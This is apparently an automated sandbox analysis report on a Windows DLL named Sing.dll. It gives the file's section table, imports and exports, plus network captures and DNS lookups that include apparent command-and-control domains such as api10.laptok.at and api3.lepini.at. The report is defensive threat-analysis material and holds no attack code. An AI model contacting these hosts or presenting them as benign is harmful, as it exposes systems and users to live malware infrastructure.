                                                                                                                                                                                                    .data0x500000x604c80x4000False0.558715820312COM executable for DOS5.48871661926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rsrc0xb10000x4d00x1000False0.150146484375data1.65729733757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .reloc0xb20000x2c740x3000False0.485595703125data4.83368153083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                    Resources

                                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                    RT_VERSION0xb10a00x2b0dataEnglishUnited States
                                                                                                                                                                                                    RT_MANIFEST0xb13500x17dXML 1.0 document textEnglishUnited States

                                                                                                                                                                                                    Imports

                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    KERNEL32.dllExitProcess, GetFileAttributesA, CreateProcessA, GetSystemDirectoryA, GetEnvironmentVariableA, MultiByteToWideChar, GetShortPathNameA, CopyFileA, GetTempFileNameA, LoadLibraryA, WaitForMultipleObjects, GetModuleFileNameA, VirtualProtect, GetCurrentProcessId, CompareStringW, CompareStringA, CreateFileA, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, ReadFile, GetLocaleInfoW, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetTimeFormatA, GetDateFormatA, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCommandLineA, GetVersionExA, HeapAlloc, GetProcessHeap, GetCPInfo, RaiseException, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, GetProcAddress, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP, GetTimeZoneInformation, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, HeapSize, GetUserDefaultLCID, SetEnvironmentVariableA
                                                                                                                                                                                                    WS2_32.dllioctlsocket, inet_ntoa, WSAStartup, recvfrom, ntohl, inet_addr, htons, WSACleanup, recv, socket, getservbyname, send, getsockopt, listen

                                                                                                                                                                                                    Exports

                                                                                                                                                                                                    NameOrdinalAddress
                                                                                                                                                                                                    DllRegisterServer10x10021230
                                                                                                                                                                                                    Exactnature20x10021130
                                                                                                                                                                                                    Happenthousand30x100215a0
                                                                                                                                                                                                    Probablepath40x10021650

                                                                                                                                                                                                    Version Infos

                                                                                                                                                                                                    DescriptionData
                                                                                                                                                                                                    LegalCopyrightCopyright Strongimagine 1996-2016
                                                                                                                                                                                                    FileVersion8.3.8.121
                                                                                                                                                                                                    CompanyNameStrongimagine
                                                                                                                                                                                                    ProductNameRoom know
                                                                                                                                                                                                    ProductVersion8.3.8.121 Soundbank
                                                                                                                                                                                                    FileDescriptionRoom know
                                                                                                                                                                                                    OriginalFilenameSing.dll
                                                                                                                                                                                                    Translation0x0409 0x04e4

                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.578371048 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.593199968 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.624738932 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.624855042 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.640058994 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.640161037 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.794764042 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.794965029 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.841253996 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.841444016 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.842334032 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.842351913 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.842406034 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.842427015 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.843575954 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.843595028 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.843664885 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.872016907 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.876569033 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.878782988 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.878918886 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.878942013 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.918380976 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.919944048 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.919959068 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.920032978 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.923110008 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.923415899 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.923489094 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.923523903 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.923546076 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.925079107 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.925096989 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.925416946 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.926136971 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.926214933 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.929445982 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.929541111 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.940157890 CET49733443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.941159010 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.993835926 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.993861914 CET44349732104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.994421005 CET49732443192.168.2.5104.20.184.68
                                                                                                                                                                                                    Feb 15, 2021 21:26:10.028172970 CET44349733104.20.184.68192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.535990953 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.537506104 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.538933039 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.540324926 CET49749443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.559175968 CET49750443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.561006069 CET49751443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.579588890 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.579718113 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.581003904 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.581119061 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.582297087 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.582405090 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.583616018 CET44349749151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.583719015 CET49749443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.587002039 CET49749443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.602608919 CET44349750151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.602838993 CET49750443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.604298115 CET44349751151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.604506016 CET49751443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.630336046 CET44349749151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.631983995 CET44349749151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.632019043 CET44349749151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.632045031 CET44349749151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.632177114 CET49749443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.632210016 CET49749443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.702423096 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.745954990 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.747209072 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.747251034 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.747270107 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.747335911 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.747360945 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.911320925 CET49751443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.912391901 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.958448887 CET44349751151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.958827019 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.959568977 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.959602118 CET44349751151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.959630966 CET44349751151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.959656000 CET44349751151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.959656000 CET49751443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.959676981 CET49751443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.959707022 CET49751443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.960531950 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.960562944 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.960617065 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.960625887 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.960663080 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.960710049 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.002389908 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004060030 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004103899 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004138947 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004247904 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004285097 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.023570061 CET49748443192.168.2.5151.101.1.44

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Feb 15, 2021 21:25:56.284198046 CET53631838.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:25:57.168649912 CET6015153192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:25:57.220179081 CET53601518.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:25:58.194308043 CET5696953192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:25:58.247823954 CET53569698.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:25:59.202315092 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:25:59.262110949 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:00.204469919 CET5475753192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:00.257827997 CET53547578.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:03.868232012 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:03.931744099 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:05.465224981 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:05.522725105 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:05.789064884 CET5501653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:05.837735891 CET53550168.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:06.485084057 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:06.534570932 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:06.564721107 CET5712853192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:06.632179022 CET53571288.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.017072916 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.076967955 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.495734930 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.550903082 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.783668995 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.847328901 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:11.728142977 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:11.795772076 CET53585308.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:14.101337910 CET5381353192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:14.172207117 CET53538138.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.036911964 CET6373253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.099294901 CET53637328.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.213633060 CET5734453192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.265760899 CET53573448.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.454019070 CET5445053192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.513926983 CET53544508.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.642267942 CET5926153192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.701730013 CET53592618.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:31.835122108 CET5715153192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:31.885976076 CET53571518.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:33.817640066 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:33.872474909 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:34.826550007 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:34.878036022 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:35.049802065 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:35.098500013 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:35.859178066 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:35.910677910 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:36.063472986 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:36.112749100 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:37.071190119 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:37.120393991 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:37.868421078 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:37.920197010 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:39.073786020 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:39.124480009 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:41.880002022 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:41.931582928 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:43.082843065 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:43.131458044 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:43.263675928 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:43.323553085 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:44.941044092 CET6508653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:45.008936882 CET53650868.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:45.277362108 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:45.339874029 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:45.445666075 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:45.494220972 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:46.542140007 CET6431753192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:46.846108913 CET53643178.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:49.186588049 CET6100453192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:49.246994019 CET53610048.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:50.084008932 CET5689553192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:50.146209955 CET53568958.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:50.620853901 CET6237253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:26:50.683176041 CET53623728.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:27:02.578643084 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:27:02.640185118 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:27:31.385003090 CET5667553192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:27:31.436376095 CET53566758.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:27:39.532502890 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:27:39.821945906 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.079586029 CET5526753192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.082242012 CET5096953192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.128356934 CET53552678.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.130829096 CET53509698.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.667834044 CET6436253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.726691961 CET53643628.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:27:50.630992889 CET5476653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:27:50.688483000 CET53547668.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:27:51.838350058 CET6144653192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:27:51.898437023 CET53614468.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:01.330615044 CET5751553192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:01.398981094 CET53575158.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:30.030843973 CET5819953192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:30.079400063 CET53581998.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:30.584244013 CET6522153192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:30.644023895 CET53652218.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:31.193239927 CET6157353192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:31.250427008 CET53615738.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:31.901190996 CET5656253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:31.960284948 CET53565628.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:32.341228008 CET5359153192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:32.403213024 CET53535918.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:32.968156099 CET5968853192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:33.026062012 CET53596888.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:34.117602110 CET5603253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:34.168524981 CET53560328.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:34.773286104 CET6115053192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:34.823050022 CET53611508.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:35.605218887 CET6345853192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:35.662259102 CET53634588.8.8.8192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:28:36.069313049 CET5042253192.168.2.58.8.8.8
                                                                                                                                                                                                    Feb 15, 2021 21:28:36.128927946 CET53504228.8.8.8192.168.2.5

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                    Feb 15, 2021 21:26:05.789064884 CET192.168.2.58.8.8.80xac24Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.017072916 CET192.168.2.58.8.8.80xa9c0Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.495734930 CET192.168.2.58.8.8.80x2ffStandard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.783668995 CET192.168.2.58.8.8.80x53e8Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:11.728142977 CET192.168.2.58.8.8.80x1abeStandard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:14.101337910 CET192.168.2.58.8.8.80x4575Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.036911964 CET192.168.2.58.8.8.80xe967Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.213633060 CET192.168.2.58.8.8.80x5df8Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.454019070 CET192.168.2.58.8.8.80x53dbStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:43.263675928 CET192.168.2.58.8.8.80xa1d5Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:46.542140007 CET192.168.2.58.8.8.80x2695Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:50.084008932 CET192.168.2.58.8.8.80x74dfStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:39.532502890 CET192.168.2.58.8.8.80x874cStandard query (0)c56.lepini.atA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.079586029 CET192.168.2.58.8.8.80x362dStandard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.082242012 CET192.168.2.58.8.8.80x4cf5Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.667834044 CET192.168.2.58.8.8.80x54f6Standard query (0)api3.lepini.atA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:50.630992889 CET192.168.2.58.8.8.80xf41aStandard query (0)api3.lepini.atA (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:51.838350058 CET192.168.2.58.8.8.80xfc4Standard query (0)api3.lepini.atA (IP address)IN (0x0001)

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                    Feb 15, 2021 21:26:05.837735891 CET8.8.8.8192.168.2.50xac24No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
